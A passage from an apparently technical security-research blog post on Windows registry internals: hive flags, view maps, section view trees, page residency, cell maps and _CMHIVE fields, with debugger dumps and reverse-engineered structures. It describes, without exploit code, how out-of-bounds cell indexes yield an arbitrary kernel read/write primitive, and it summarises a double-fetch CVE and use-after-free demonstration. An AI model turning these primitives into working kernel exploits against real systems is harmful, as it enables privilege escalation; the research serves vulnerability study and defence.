      HIVE_VOLATILE                      = 0x1,

      HIVE_NOLAZYFLUSH                   = 0x2,

      HIVE_PRELOADED                     = 0x10,

      HIVE_IS_UNLOADING                  = 0x20,

      HIVE_COMPLETE_UNLOAD_STARTED       = 0x40,

      HIVE_ALL_REFS_DROPPED              = 0x80,

      HIVE_ON_PRELOADED_LIST             = 0x400,

      HIVE_FILE_READ_ONLY                = 0x8000,

      HIVE_SECTION_BACKED                = 0x20000,

      HIVE_DIFFERENCING                  = 0x80000,

      HIVE_IMMUTABLE                     = 0x100000,

      HIVE_FILE_PAGES_MUST_BE_KEPT_LOCAL = 0x800000,

    };


    Below is a one-liner explanation of each flag:

    • HIVE_VOLATILE: the hive exists in memory only; set, e.g., for \Registry and \Registry\Machine\HARDWARE.
    • HIVE_NOLAZYFLUSH: changes to the hive aren't automatically flushed to disk and require a manual flush; set, e.g., for \Registry\Machine\SAM.
    • HIVE_PRELOADED: the hive is one of the default, system ones; set, e.g., for \Registry\Machine\SOFTWARE, \Registry\Machine\SYSTEM, etc.
    • HIVE_IS_UNLOADING: the hive is currently being loaded or unloaded in another thread and shouldn't be accessed before the operation is complete.
    • HIVE_COMPLETE_UNLOAD_STARTED: the unloading process of the hive has started in CmpCompleteUnloadKey.
    • HIVE_ALL_REFS_DROPPED: all references to the hive through KCBs have been dropped.
    • HIVE_ON_PRELOADED_LIST: the hive is linked into a linked-list via the PreloadedHiveList field.
    • HIVE_FILE_READ_ONLY: the underlying hive file is read-only and shouldn't be modified; indicates that the hive was loaded with the REG_OPEN_READ_ONLY flag set.
    • HIVE_SECTION_BACKED: the hive is mapped in memory using section views.
    • HIVE_DIFFERENCING: the hive is a differencing one (version 1.6, loaded under \Registry\WC).
    • HIVE_IMMUTABLE: the hive is immutable and cannot be modified; indicates that it was loaded with the REG_IMMUTABLE flag set.
    • HIVE_FILE_PAGES_MUST_BE_KEPT_LOCAL: the kernel always maintains a local copy of every page of the hive, either by locking it in physical memory or creating a private copy through the CoW mechanism.

    Log file information

    Between offsets 0xA4 to 0xCC, there are a number of fields having to do with log file management, i.e. the .LOG1/.LOG2 files accompanying the main hive file on disk.

    Hive version

    The Version field stores the minor version of the hive, which should theoretically be an integer between 3–6. However, as mentioned in the previous blog post, it is possible to set it to an arbitrary 32-bit value either by specifying a major version equal to 0 and any desired minor version, or by enticing the kernel to recover the hive header from a log file, and abusing the fact that the HvAnalyzeLogFiles function is more permissive than HvpGetHiveHeader. Nevertheless, I haven't found any security implications of this behavior.

    View map

    The view map holds all the essential information about how the hive is mapped in memory. The specific implementation of registry memory management has evolved considerably over the years, with its details changing between consecutive system versions. In the latest ones, the view map is represented by the top-level _HVP_VIEW_MAP public structure:

    0: kd> dt _HVP_VIEW_MAP

    nt!_HVP_VIEW_MAP

       +0x000 SectionReference : Ptr64 Void

       +0x008 StorageEndFileOffset : Int8B

       +0x010 SectionEndFileOffset : Int8B

       +0x018 ProcessTuple     : Ptr64 _CMSI_PROCESS_TUPLE

       +0x020 Flags            : Uint4B

       +0x028 ViewTree         : _RTL_RB_TREE


    The semantics of its respective fields are as follows:

    • SectionReference: Contains a kernel-mode handle to a section object corresponding to the hive file, created via ZwCreateSection in CmSiCreateSectionForFile.
    • StorageEndFileOffset: Stores the maximum size of the hive that can be represented with file-backed sections at any given time. Initially set to the size of the loaded hive, it can dynamically increase or decrease at runtime for mutable (normal) hives.
    • SectionEndFileOffset: Represents the size of the hive file section at the time of loading. It is never modified past the first initialization in HvpViewMapStart, and seems to be mostly used as a safeguard against extending an immutable hive file beyond its original size.
    • ProcessTuple: A structure of type _CMSI_PROCESS_TUPLE, it identifies the host process of the hive's section views. This field currently always points to the global CmpRegistryProcess object, which corresponds to the dedicated "Registry" process that hosts all hive mappings in the system. However, this field could enable a more fine-grained separation of hive mappings across multiple processes, should Microsoft choose to implement such a feature.
    • Flags: Represents a set of memory management flags relevant to the entire hive. These flags are not publicly documented; however, through reverse engineering, I have determined their purpose to be as follows:
    • VIEW_MAP_HIVE_FILE_IMMUTABLE (0x1): Indicates that the hive has been loaded as immutable, meaning no data is ever saved back to the underlying hive file.
    • VIEW_MAP_MUST_BE_KEPT_LOCAL (0x2): Indicates that all of the hive data must be persistently stored in memory, and not just accessible through file-backed sections. This is likely to protect against double-fetch conditions involving hives loaded from remote network shares.
    • VIEW_MAP_CONTAINS_LOCKED_PAGES (0x4): Indicates that some of the hive's pages are currently locked in physical memory using ZwLockVirtualMemory.
    • ViewTree: This is the root of a view tree structure, which contains the descriptors of each continuous section view mapped in memory.

    Overall, the implementation of low-level hive memory management in Windows is more complex than might initially seem necessary. This complexity arises from the kernel's need to gracefully handle a variety of corner cases and interactions. For example, hives may be loaded as immutable, which indicates that the hive may be operated on in memory, but changes must not be flushed to disk. Simultaneously, the system must support recovering data from .LOG files, including the possibility of extending the hive beyond its original on-disk length. At runtime, it must also be possible to efficiently modify the registry data, as well as shrink and extend it on demand. To further complicate matters, Windows enforces different rules for locking hive pages in memory depending on the backing volume of the file, carefully balancing optimal memory usage and system security guarantees. These and many other factors collectively contribute to the complexity of hive memory management.

    To better understand how the view tree is organized, let's first analyze the general logic of the hive mapping code.

    The hive mapping logic

    The main kernel function responsible for mapping a hive in memory is HvLoadHive. It implements the overall logic and coordinates various sub-routines responsible for performing more specialized tasks, in the following order:

    1. Header Validation: The kernel reads and inspects the hive's header to ascertain its integrity, ensuring that the hive has not been tampered with or corrupted. Relevant function: HvpGetHiveHeader.
    2. Log Analysis: The kernel processes the hive's transaction logs, scrutinising them to identify any pending changes or inconsistencies that necessitate recovery procedures. Relevant function: HvAnalyzeLogFiles.
    3. Initial Section Mapping: A section object is created based on the hive file, and further segmented into multiple views, each aligned to 4 KiB boundaries and capped at 2 MiB. At this point, the kernel prioritizes the creation of an initial mapping without focusing on the granular layout of individual bins within the hive. Relevant function: HvpViewMapStart.
    4. Cell Map Initialization: The cell map, a component that translates cell indexes to memory address, is initialized. Its entries are configured to point to the newly created views. Relevant function: HvpMapHiveImageFromViewMap.
    5. Log Recovery (if required): If the preceding log analysis reveals the need for data recovery, the kernel attempts to restore data integrity. This is the earliest point at which the newly created memory mappings may already be modified and marked as "dirty", indicating that their contents have been altered and require synchronisation with the on-disk representation. Relevant function: HvpPerformLogFileRecovery.
    6. Bin Mapping: In this final stage, the kernel establishes definitive memory mappings for each bin within the hive, ensuring that each bin occupies a contiguous region of memory. This process may necessitate creating new views, eliminating existing ones, or adjusting their boundaries to accommodate the specific arrangement of bins. Relevant function: HvpRemapAndEnlistHiveBins.

    Now that we understand the primary components of the loading process, we can examine the internal structure of the section view tree in more detail.

    The view tree

    Let's consider an example hive consisting of three bins of sizes 256 KiB, 2 MiB and 128 KiB, respectively. After step 3 ("Initial Section Mapping"), the section views created by the kernel are as follows:

    Diagram illustrating the initial section view layout for a sample Windows Registry hive. The top section shows the hive layout with Header, Bin 1 (256 KB), Bin 2 (2 MB), and Bin 3 (128 KB). The bottom section shows the corresponding initial kernel mapping: View 1 (1.996 MiB) spanning Bin 1 and most of Bin 2, and View 2 (388 KiB) spanning the end of Bin 2 and Bin 3.

    As we can see, at this point, the kernel doesn't concern itself with bin boundaries or continuity: all it needs to achieve is to make every page of the hive accessible through a section view for log recovery purposes. In simple terms, the way that HvpViewMapStart (or more specifically, HvpViewMapCreateViewsForRegion) works is it creates as many 2 MiB views as necessary, followed by one last view that covers the remaining part of the file. So in our example, we have the first view that covers bin 1 and the beginning of bin 2, and the second view that covers the trailing part of bin 2 and the entire bin 3. It's important to note that memory continuity is only guaranteed within the scope of a single view, and views 1 and 2 may be mapped at completely different locations in the virtual address space.

    Later in step 6, the system ensures that every bin is mapped as a contiguous block of memory before handing off the hive to the client. This is done by iterating through all the bins, and for every bin that spans more than one view in the current view map, the following operations are performed:

    • If the start and/or the end of the bin fall into the middle of existing views, these views are truncated from either side. Furthermore, if there are any views that are fully covered by the bin, they are freed and removed from the tree.
    • A new, dedicated section view is created for the bin and inserted into the view tree.

    In our hypothetical scenario, the resulting view layout would be as follows:

    Diagram showing a Windows Registry hive layout divided into Header, Bin 1 (256KB), Bin 2 (2MB), and Bin 3 (128KB), with a corresponding section view layout illustrating how View 1, View 2, and View 3 map onto these bins.

    As we can see, the kernel shrinks views 1 and 2, and creates a new view 3 corresponding to bin 2 to fill the gap. The final layout of the binary tree of section view descriptors is illustrated below:

    Diagram showing the final binary tree layout of section view descriptors for a Windows Registry hive. View 3 is the root node, with View 1 as the left child and View 2 as the right child. Each node box displays the specific valid and overall memory address ranges (in hexadecimal) associated with that view descriptor.

    Knowing this, we can finally examine the structure of a single view tree entry. It is not included in the public symbols, but I named it _HVP_VIEW. My reverse-engineered version of its definition is as follows:

    struct _HVP_VIEW

    {

      RTL_BALANCED_NODE Node;

      LARGE_INTEGER ViewStartOffset;

      LARGE_INTEGER ViewEndOffset;

      SSIZE_T ValidStartOffset;

      SSIZE_T ValidEndOffset;

      PBYTE MappingAddress;

      SIZE_T LockedPageCount;

      _HVP_VIEW_PAGE_FLAGS PageFlags[];

    };


    The role of each particular field is documented below:

    • Node: This is the structure used to link all of the entries into a single red-black tree, passed to helper kernel functions such as RtlRbInsertNodeEx and RtlRbRemoveNode.
    • ViewStartOffset and ViewEndOffset: This offset pair specifies the overall byte range covered by the underlying section view object in the hive file. Their difference corresponds to the cumulative length of the red and green boxes in a single row in the diagrams above.
    • ValidStartOffset and ValidEndOffset: This offset pair specifies the valid range of the hive accessible through this view, i.e. the green rectangles in the diagrams. It must always be a subset of the [ViewStartOffset, ViewEndOffset] range, and may dynamically change while re-mapping bins (as just shown in this section), as well as when shrinking and extending the hive.
    • MappingAddress: This is the base address of the section view mapping in memory, as returned by ZwMapViewOfSection. It is valid in the context of the process specified by _HVP_VIEW_MAP.ProcessTuple (currently always the "Registry" process). It covers the entire range between [ViewStartOffset, ViewEndOffset], but only pages between [ValidStartOffset, ValidEndOffset] are accessible, and the rest of the section view is marked as PAGE_NOACCESS.
    • LockedPageCount: Specifies the number of pages locked in virtual memory using ZwLockVirtualMemory within this view.
    • PageFlags: A variable-length array that specifies a set of flags for each memory page in the [ViewStartOffset, ViewEndOffset] range.

    I haven't found any (un)official sources documenting the set of supported page flags, so below is my attempt to name them and explain their meaning:

    Flag

    Value

    Description

    VIEW_PAGE_VALID

    0x1

    Indicates if the page is valid – true for pages between [ValidStartOffset, ValidEndOffset], false otherwise. If this flag is clear, all other flags are irrelevant/unused.

    The flag is set:

    • When creating section views during hive loading, first the initial ones in HvpViewMapStart, and then the bin-specific ones in HvpRemapAndEnlistHiveBins.
    • When extending an active hive in HvpViewMapExtendStorage.

    The flag is cleared:

    • When trimming the existing views in HvpRemapAndEnlistHiveBins to make room for new ones.
    • When shrinking the hive in HvpViewMapShrinkStorage.

    VIEW_PAGE_COW_BY_CALLER

    0x2

    Indicates if the kernel maintains a copy of the page through the copy-on-write (CoW) mechanism, as initiated by a client action, e.g. a registry operation that modified data in a cell and thus resulted in marking the page as dirty.

    The flag is set:

    • When dirtying a hive cell, in HvpViewMapMakeViewRangeCOWByCaller.

    The flag is cleared:

    • When flushing the registry changes to disk, in HvpViewMapMakeViewRangeUnCOWByCaller.

    VIEW_PAGE_COW_BY_POLICY

    0x4

    Indicates if the kernel maintains a copy of the page through the copy-on-write (CoW) mechanism, as required by the policy that all pages of non-local hives (hives loaded from volumes other than the system volume) must always remain in memory.

    The flag is set:

    • In HvpViewMapMakeViewRangeValid, as an alternative way of keeping a local copy of the hive pages in memory (if locking fails, or the caller doesn't want the pages locked).
    • In HvpViewMapMakeViewRangeCOWByCaller, when converting previously locked pages to the "CoW by policy" state.
    • In HvpMappedViewConvertRegionFromLockedToCOWByPolicy, when lazily converting previously locked pages to the "CoW by policy" state in a thread that runs every 60 seconds (as indicated by CmpLazyLocalizeIntervalInSeconds).

    The flag is cleared:

    • In HvpViewMapMakeViewRangeUnCOWByPolicy, which currently only ever seems to happen for hives loaded from the system volume, i.e. "\SystemRoot" and "\OSDataRoot", as listed in the global CmpWellKnownVolumeList array.

    VIEW_PAGE_WRITABLE

    0x8

    Indicates if the page is currently marked as writable, typically as a result of a modifying operation on the page that hasn't been yet flushed to disk.

    The flag is set:

    • In HvpViewMapMakeViewRangeCOWByCaller, when marking a cell as dirty.

    The flag is cleared:

    • In HvpViewMapMakeViewRangeUnCOWByCaller, when flushing the hive changes to disk.
    • In HvpViewMapSealRange, when setting the memory as read-only for miscellaneous reasons (after performing log file recovery, etc.).

    VIEW_PAGE_LOCKED

    0x10

    Indicates if the page is currently locked in physical memory.

    The flag is set:

    • In HvpViewMapMakeViewRangeValid if the caller requests page locking, and there is enough space left in the 64 MiB working set of the Registry process. In practice, this boils down to locking the initial 2 MiB hive mappings created in HvpViewMapStart for all app hives and for normal hives outside of the system disk volume.

    The flag is cleared:

    • Whenever the state of the page changes to CoW-by-policy or Invalid in the following functions:
    • HvpViewMapMakeViewRangeCOWByCaller
    • HvpMappedViewConvertRegionFromLockedToCOWByPolicy
    • HvpViewMapMakeViewRangeUnCOWByPolicy
    • HvpViewMapMakeViewRangeInvalid

    The semantics of most of the flags are straightforward, but perhaps VIEW_PAGE_COW_BY_POLICY and VIEW_PAGE_LOCKED warrant a slightly longer explanation. The two flags are mutually exclusive, and they represent nearly identical ways to achieve the same goal: ensure that a copy of each hive page remains resident in memory or a pagefile. Under normal circumstances, the kernel could simply create the necessary section views in their default form, and let the memory management subsystem decide how to handle their pages most efficiently. However, one of the guarantees of the registry is that once a hive has been loaded, it must remain operational for as long as it is active in the system. On the other hand, section views have the property that (parts of) their underlying data may be completely evicted by the kernel, and later re-read from the original storage medium such as the hard drive. So, it is possible to imagine a situation where:

    • A hive is loaded from a removable drive (e.g. a CD-ROM or flash drive) or a network share,
    • Due to high memory pressure from other applications, some of the hive pages are evicted from memory,
    • The removable drive with the hive file is ejected from the system,
    • A client subsequently tries to operate on the hive, but parts of it are unavailable and cannot be fetched again from the original source.

    This could cause some significant problems and make the registry code fail in unexpected ways. It would also constitute a security vulnerability: the kernel assumes that once it has opened and sanitized the hive file, its contents remain consistent for as long as the hive is used. This is achieved by opening the file with exclusive access, but if the hive data was ever re-read by the Windows memory manager, a malicious removable drive or an attacker-controlled network share could ignore the exclusivity request and provide different, invalid data on the second read. This would result in a kind of "double fetch" condition and potentially lead to kernel memory corruption.

    To address both the reliability and security concerns, Windows makes sure to never evict pages corresponding to hives for which exclusive access cannot be guaranteed. This covers hives loaded from a location other than the system volume, and since Windows 10 19H1, also all app hives regardless of the file location. The first way to achieve this is by locking the pages directly in physical memory with a ZwLockVirtualMemory call. It is used for the initial ≤ 2 MiB section views created while loading a hive, up to the working set limit of the Registry process currently set at 64 MiB. The second way is by taking advantage of the copy-on-write mechanism – that is, marking the relevant pages as PAGE_WRITECOPY and subsequently touching each of them using the HvpViewMapTouchPages helper function. This causes the memory manager to create a private copy of each memory page containing the same data as the original, thus preventing them from ever being unavailable for registry operations.

    Between the two types of resident pages, the CoW type effectively becomes the default option in the long term. Eventually most pages converge to this state, even if they initially start as locked. This is because locked pages transition to CoW on multiple occasions, e.g. when converted by the background CmpDoLocalizeNextHive thread that runs every 60 seconds, or during the modification of a cell. On the other hand, once a page transitions to the CoW state, it never reverts to being locked. A diagram illustrating the transitions between the page residence states in a hive loaded from removable/remote storage is shown below:

    State transition diagram illustrating data states like VALID, LOCKED, and COW (Copy-on-Write), and transitions such as load, dirty, and flush, in the context of Windows Registry data management.

    For normal hives loaded from the system volume (i.e. without the VIEW_MAP_MUST_BE_KEPT_LOCAL flag set), the state machine is much simpler:

    Simplified state machine diagram for normal Windows Registry hive loading (without VIEW_MAP_MUST_BE_KEPT_LOCAL flag). It shows a 'load' action leading to a 'VALID' state. A 'dirty' action transitions to a combined 'VALID/WRITABLE/COW_BY_CALLER' state, and a 'flush' action returns to the 'VALID' state.

    As a side note, CVE-2024-43452 was an interesting bug that exploited a flaw in the page residency protection logic. The bug arose because some data wasn't guaranteed to be resident in memory and could be fetched twice from a remote SMB share during bin mapping. This occurred early in the hive loading process, before page residency protections were fully in place. The kernel trusted the data from the second read without re-validation, allowing it to be maliciously set to invalid values, resulting in kernel memory corruption.

    Cell maps

    As discussed in Part 5, almost every cell contains references to other cells in the hive in the form of cell indexes. Consequently, virtually every registry operation involves multiple rounds of translating cell indexes into their corresponding virtual addresses in order to traverse the registry structure. Section views are stored in a red-black tree, so the search complexity is O(log n). This may seem decent, but if we consider that on a typical system, the registry is read much more often than it is extended/shrunk, it becomes apparent that it makes sense to further optimize the search operation at the cost of a less efficient insertion/deletion. And this is exactly what cell maps are: a way of trading a faster search complexity of O(1) for slower insertion/deletion complexity of O(n) instead of O(log n). Thanks to this technique, HvpGetCellPaged – perhaps the hottest function in the Windows registry implementation – executes in constant time.

    In technical terms, cell maps are pagetable-like structures that divide the 32-bit hive address space into smaller, nested layers consisting of so-called directories, tables, and entries. As a reminder, the layout of cell indexes and cell maps is illustrated in the diagram below, based on a similar diagram in the Windows Internals book, which itself draws from Mark Russinovich's 1999 article, Inside the Registry:

    Diagram illustrating the Windows Registry cell index structure and lookup mechanism, showing how the index's fields (Storage selector, Directory index, Table index, Byte offset) navigate through Storage list, Directory, and Table structures to locate a target Cell block.

    Given the nature of the data structure, the corresponding cell map walk involves dereferencing three nested arrays based on the subsequent 1, 10 and 9-bit parts of the cell index, and then adding the final 12-bit offset to the page-aligned address of the target block. The internal kernel structures matching the respective layers of the cell map are _DUAL, _HMAP_DIRECTORY, _HMAP_TABLE and _HMAP_ENTRY, all publicly accessible via the ntoskrnl.exe PDB symbols. The entry point to the cell map is the Storage array at the end of the _HHIVE structure:

    0: kd> dt _HHIVE

    nt!_HHIVE

    [...]

       +0x118 Storage          : [2] _DUAL


    The index into the two-element array represents the storage type, 0 for stable and 1 for volatile, so a single _DUAL structure describes a 2 GiB view of a specific storage space:

    0: kd> dt _DUAL

    nt!_DUAL

       +0x000 Length           : Uint4B

       +0x008 Map              : Ptr64 _HMAP_DIRECTORY

       +0x010 SmallDir         : Ptr64 _HMAP_TABLE

       +0x018 Guard            : Uint4B

       +0x020 FreeDisplay      : [24] _FREE_DISPLAY

       +0x260 FreeBins         : _LIST_ENTRY

       +0x270 FreeSummary      : Uint4B


    Let's examine the semantics of each field:

    • Length: Expresses the current length of the given storage space in bytes. Directly after loading the hive, the stable length is equal to the size of the hive on disk (including any data recovered from log files, minus the 4096 bytes of the header), and the volatile space is empty by definition. Only cell map entries within the [0, Length - 1] range are guaranteed to be valid.
    • Map: Points to the actual directory structure represented by _HMAP_DIRECTORY.
    • SmallDir: Part of the "small dir" optimization, discussed in the next section.
    • Guard: Its specific role is unclear, as the field is always initialized to 0xFFFFFFFF upon allocation and never used afterwards. I expect that it is some kind of debugging remnant from the early days of the registry development, presumably related to the small dir optimization.
    • FreeDisplay: A data structure used to optimize searches for free cells during the cell allocation process. It consists of 24 buckets, each corresponding to a specific cell size range and represented by the _FREE_DISPLAY structure, indicating which pages in the hive may potentially contain free cells of the given length.
    • FreeBins: The head of a doubly-linked list that links the descriptors of entirely empty bins in the hive, represented by the _FREE_HBIN structures.
    • FreeSummary: A bitmask indicating which buckets within FreeDisplay have any hints set for the given cell size. A zero bit at a given position means that there are no free cells of the specific size range anywhere in the hive.

    The next level in the cell map hierarchy is the _HMAP_DIRECTORY structure:

    0: kd> dt _HMAP_DIRECTORY

    nt!_HMAP_DIRECTORY

       +0x000 Directory        : [1024] Ptr64 _HMAP_TABLE


    As we can see, it is simply a 1024-element array of pointers to _HMAP_TABLE:

    0: kd> dt _HMAP_TABLE

    nt!_HMAP_TABLE

       +0x000 Table            : [512] _HMAP_ENTRY


    Further, we get a 512-element array of pointers to the final level of the cell map, _HMAP_ENTRY:

    0: kd> dt _HMAP_ENTRY

    nt!_HMAP_ENTRY

       +0x000 BlockOffset      : Uint8B

       +0x008 PermanentBinAddress : Uint8B

       +0x010 MemAlloc         : Uint4B


    This last level contains a descriptor of a single page in the hive and warrants a deeper analysis. Let's start by noting that the four least significant bits of PermanentBinAddress correspond to a set of undocumented flags that control various aspects of the page behavior. I was able to reverse-engineer them and partially recover their names, largely thanks to the fact that some older Windows 10 builds contained non-inlined functions operating on these flags, with revealing names like HvpMapEntryIsDiscardable or HvpMapEntryIsTrimmed:

    enum _MAP_ENTRY_FLAGS

    {

      MAP_ENTRY_NEW_ALLOC   = 0x1,

      MAP_ENTRY_DISCARDABLE = 0x2,

      MAP_ENTRY_TRIMMED     = 0x4,

      MAP_ENTRY_DUMMY       = 0x8,

    };


    Here's a brief summary of their meaning based on my understanding:

    • MAP_ENTRY_NEW_ALLOC: Indicates that this is the first page of a bin. Cell indexes pointing into this page must specify an offset within the range of [0x20, 0xFFF], as they cannot fall into the first 32 bytes that correspond to the _HBIN structure.
    • MAP_ENTRY_DISCARDABLE: Indicates that the whole bin is empty and consists of a single free cell.
    • MAP_ENTRY_TRIMMED: Indicates that the page has been marked as "trimmed" in HvTrimHive. More specifically, this property is related to hive reorganization, and is set during the loading process on some number of trailing pages that only contain keys accessed during boot, or not accessed at all since the last reorganization. The overarching goal is likely to prevent introducing unnecessary fragmentation in the hive by avoiding mixing together keys with different access histories.
    • MAP_ENTRY_DUMMY: Indicates that the page is allocated from the kernel pool and isn't part of a section view.

    With this in mind, let's dive into the details of each _HMAP_ENTRY structure member:

    • PermanentBinAddress: The lower 4 bits contain the above flags. The upper 60 bits represent the base address of the bin mapping corresponding to this page.
    • BlockOffset: This field has a dual functionality. If the MAP_ENTRY_DISCARDABLE flag is set, it is a pointer to a descriptor of a free bin, _FREE_HBIN, linked into the _DUAL.FreeBins linked list. If it is clear (the typical case), it expresses the offset of the page relative to the start of the bin. Therefore, the virtual address of the block's data in memory can be calculated as (PermanentBinAddress & (~0xF)) + BlockOffset.
    • MemAlloc: If the MAP_ENTRY_NEW_ALLOC flag is set, it contains the size of the bin, otherwise it is zero.

    And this concludes the description of how cell maps are structured. Taking all of it into account, the implementation of the HvpGetCellPaged function starts to make a lot of sense. Its pseudocode comes down to the following:

    _CELL_DATA *HvpGetCellPaged(_HHIVE *Hive, HCELL_INDEX Index) {

      _HMAP_ENTRY *Entry = &Hive->Storage[Index >> 31].Map

                                ->Directory[(Index >> 21) & 0x3FF]

                                ->Table[(Index >> 12) & 0x1FF];

      return (Entry->PermanentBinAddress & (~0xF)) + Entry->BlockOffset + (Index & 0xFFF) + 4;

    }


    The same process is followed, for example, by the implementation of the WinDbg !reg cellindex extension, which also translates a pair of a hive pointer and a cell index into the virtual address of the cell.

    The small dir optimization

    There is one other implementation detail about the cell maps worth mentioning here – the small dir optimization. Let's start with the observation that a majority of registry hives in Windows are relatively small, below 2 MiB in size. This can be easily verified by using the !reg hivelist command in WinDbg, and taking note of the values in the "Stable Length" and "Volatile Length" columns. Most of them usually contain values between several kilobytes to hundreds of kilobytes. This would mean that if the kernel allocated the full first-level directory for these hives (taking up 1024 entries × 8 bytes = 8 KiB on 64-bit platforms), they would still only use the first element in it, leading to a non-trivial waste of memory – especially in the context of the early 1990's when the registry was first implemented. In order to optimize this common scenario, Windows developers employed an unconventional approach to simulate a 1-item long "array" with the SmallDir member of type _HMAP_TABLE in the _DUAL structure, and have the _DUAL.Map pointer point at it instead of a separate pool allocation when possible. Later, whenever the hive grows and requires more than one element of the cell map directory, the kernel falls back to the standard behavior and performs a normal pool allocation for the directory array.

    A revised diagram illustrating the cell map layout of a small hive is shown below:

    Diagram illustrating the Windows Registry cell index structure and lookup process with the "small dir" optimization applied for small hives. It shows the Cell index fields (Storage selector, Directory index, Table index, Byte offset). The Directory index points to a "Small directory" structure, visually indicating that although the index allows for 1024 entries, only the first entry is typically represented by the embedded structure in this optimized scenario to save memory, with the rest marked as unused initially. The lookup proceeds via Storage list, Small directory, and Table to locate the target Cell block.

    Here, we can see that indexes 1 through 1023 of the directory array are invalid. Instead of correctly initialized _HMAP_TABLE structures, they point into "random" data corresponding to other members of the _DUAL and the larger _CMHIVE structure that happen to be located after _DUAL.SmallDir. Ordinarily, this is merely a low-level detail that doesn't have any meaningful implications, as all actively loaded hives remain internally consistent and always contain cell indexes that remain within the bounds of the hive's storage space. However, if we look at it through the security lens of hive-based memory corruption, this behavior suddenly becomes very interesting. If an attacker was able to implant an out-of-bounds cell index with the directory index greater than 0 into a hive, they would be able to get the kernel to operate on invalid (but deterministic) data as part of the cell map walk, and enable a powerful arbitrary read/write primitive. In addition to the small dir optimization, this technique is also enabled by the fact that the HvpGetCellPaged routine doesn't perform any bounds checks of the cell indexes, instead blindly trusting that they are always valid.

    If you are curious to learn more about the exploitation aspect of out-of-bounds cell indexes, it was the main subject of my Practical Exploitation of Registry Vulnerabilities in the Windows Kernel talk given at OffensiveCon 2024 (slides and video recording are available). I will also discuss it in more detail in one of the future blog posts focused specifically on the security impact of registry vulnerabilities.

    _CMHIVE structure overview

    Beyond the first member of type _HHIVE at offset 0, the _CMHIVE structure contains more than 3 KiB of further information describing an active hive. This data relates to concepts more abstract than memory management, such as the registry tree structure itself. Below, instead of a field-by-field analysis, we'll focus on the general categories of information within _CMHIVE, organized loosely by increasing complexity of the data structures:

    • Reference count: a 32-bit refcount primarily used during short-term operations on the hive, to prevent the object from being freed while actively operated on. These are used by the thin wrappers CmpReferenceHive and CmpDereferenceHive.
    • File handles and sizes: handles and current sizes of the hive files on disk, such as the main hive file (.DAT) and the accompanying log files (.LOG, .LOG1, .LOG2). The handles are stored in FileHandles array, and the sizes reside in ActualFileSize and LogFileSizes.
    • Text strings: some informational strings that may prove useful when trying to identify a hive based on its _CMHIVE structure. For example, the hive file name is stored in FileUserName, and the hive mount point path is stored in HiveRootPath.
    • Timestamps: there are several timestamps that can be found in the hive descriptor, such as DirtyTime, UnreconciledTime or LastWriteTime.
    • List entries: instances of the _LIST_ENTRY structure used to link the hive into various double-linked lists, such as the global list of hives in the system (HiveList, starting at nt!CmpHiveListHead), or the list of hives within a common trust class (TrustClassEntry).
    • Synchronization mechanisms: various objects used to synchronize access to the hive as a whole, or some of its parts. Examples include HiveRundown, SecurityLock and HandleClosePendingEvent.
    • Unload history: a 128-element array that stores the number of steps that have been successfully completed in the process of unloading the hive. Its specific purpose is unclear, it might be a debugging artifact retained from older versions of Windows.
    • Late unload state: objects related to deferred unloading of registry hives (LateUnloadWorkItemState, LateUnloadFinishedEvent, LateUnloadWorkItem).
    • Hive layout information: the hive reorganization process in Windows tries to optimize hives by grouping together keys accessed during system runtime, followed by keys accessed during system boot, followed by completely unused keys. If a hive is structured according to this order during load, the kernel saves information about the boundaries between the three distinct areas in the BootStart, UnaccessedStart and UnaccessedEnd members of _CMHIVE.
    • Flushing state and dirty block information: any state that has to do with marking cells as dirty and synchronizing their contents to disk. There are a significant number of fields related to the functionality, with names starting with "Flush...", "Unreconciled..." and "CapturedUnreconciled...".
    • Volume context: a pointer to a public _CMP_VOLUME_CONTEXT structure, which provides extended information about the disk volume of the hive file. As an example, it is used in the internal CmpVolumeContextMustHiveFilePagesBeKeptLocal routine to determine whether the volume is a system one, and consequently whether certain security/reliability assumptions are guaranteed for it or not.
    • KCB table and root KCB: a table of the globally visible KCB (Key Control Block) structures corresponding to keys in the hive, and a pointer to the root key's KCB. I will discuss KCBs in more detail in the "Key structures" section below.
    • Security descriptor cache: a cache of all security descriptors present in the hive, allocated from the kernel pool and thus accessible more efficiently than the underlying hive mappings. In my bug reports, I have often taken advantage of the security cache as a straightforward way to demonstrate the exploitability of security descriptor use-after-frees. A security node UAF can be easily converted into an UAF of its pool-based cached object, which then reliably triggers a Blue Screen of Death when Special Pool is enabled. The security cache of any given hive can be enumerated using the !reg seccache command in WinDbg.
    • Transaction-related objects: a pointer to a _CM_RM structure that describes the Resource Manager object associated with the hive, if "heavyweight" transactions (i.e. KTM transactions) are enabled for it.

    Last but not least, _CMHIVE has its own Flags field that is different from _HHIVE.Flags. As usual, the flags are not documented, so the listing below is a product of my own analysis:

    enum _CM_HIVE_FLAGS

    {

      CM_HIVE_UNTRUSTED                 = 0x1,

      CM_HIVE_IN_SID_MAPPING_TABLE      = 0x2,

      CM_HIVE_HAS_RM                    = 0x8,

      CM_HIVE_IS_VIRTUALIZABLE          = 0x10,

      CM_HIVE_APP_HIVE                  = 0x20,

      CM_HIVE_PROCESS_PRIVATE           = 0x40,

      CM_HIVE_MUST_BE_REORGANIZED       = 0x400,

      CM_HIVE_DIFFERENCING_WRITETHROUGH = 0x2000,

      CM_HIVE_CLOUDFILTER_PROTECTED     = 0x10000,

    };


    A brief description of each of them is as follows:

    • CM_HIVE_UNTRUSTED: the hive is "untrusted" in the sense of registry symbolic links; in other words, it is not one of the default system hives loaded on boot. The distinction is that trusted hives can freely link to all other hives in the system, while untrusted ones can only link to hives within their so-called trust class. This is to prevent confused deputy-style privilege escalation attacks in the system.
    • CM_HIVE_IN_SID_MAPPING_TABLE: the hive is linked into an internal data structure called the "SID mapping table" (nt!CmpSIDToHiveMapping), used to efficiently look up the user class hives mounted at \Registry\User\<SID>_Classes for the purposes of registry virtualization.
    • CM_HIVE_HAS_RM: KTM transactions are enabled for this hive, meaning that the corresponding .blf and .regtrans-ms files are present in the same directory as the main hive file. The flag is clear if the hive is an app hive or if it was loaded with the REG_HIVE_NO_RM flag set.
    • CM_HIVE_IS_VIRTUALIZABLE: accesses to this hive may be subject to registry virtualization. As far as I know, the only hive with this flag set is currently HKLM\SOFTWARE, which seems in line with the official documentation.
    • CM_HIVE_APP_HIVE: this is an app hive, i.e. it was loaded under \Registry\A with the REG_APP_HIVE flag set.
    • CM_HIVE_PROCESS_PRIVATE: this hive is private to the loading process, i.e. it was loaded with the REG_PROCESS_PRIVATE flag set.
